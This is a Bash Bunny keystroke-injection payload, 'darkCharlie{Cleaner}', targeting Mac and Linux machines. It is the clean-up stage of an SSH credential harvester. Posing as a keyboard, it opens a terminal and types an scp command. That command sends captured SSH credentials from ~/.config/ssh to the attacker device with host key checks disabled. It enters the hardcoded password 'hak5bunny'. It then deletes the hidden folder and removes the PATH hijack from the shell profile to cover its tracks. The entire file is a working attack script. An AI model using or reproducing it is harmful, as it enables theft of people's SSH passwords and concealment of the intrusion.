bashbunny-payloads/payloads/library/credentials/darkCharlie/cleaner/payload.txt

#!/bin/bash

# Title:     darkCharlie{Cleaner}
# Author:    Michael Weinstein
# Target:    Mac/Linux
# Version:   0.1
#
# Get the ssh creds from our loot collection.
# And clean up after
#
# White            |  Ready
# Blue blinking    |  Attacking
# Green            |  Finished

LED SETUP

#setup the attack on macos (if false, attack is for Linux)
mac=false

if [ "$mac" = true ]
then
    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
    ATTACKMODE ECM_ETHERNET HID
fi

DUCKY_LANG us

GET SWITCH_POSITION
GET HOST_IP

cd /root/udisk/payloads/$SWITCH_POSITION/
LOOT=/root/udisk/loot/darkCharlie
mkdir -p $LOOT

LED ATTACK

if [ "$mac" = true ]
then
    RUN OSX terminal
else
    RUN UNITY xterm
fi
QUACK DELAY 2000

QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json  #nice hiding of known host info
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 500
QUACK STRING hak5bunny
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 500
if [ "$mac" = true ]
then
    QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile   #macs really seem to hate it when you sed in place, I think.
    QUACK ENTER
    QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
else
    QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
fi
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
    QUACK DELAY 2000
    QUACK GUI w
else
    QUACK STRING exit
    QUACK DELAY 200
    QUACK ENTER
fi
LED SUCCESS
#See you, space cowboy...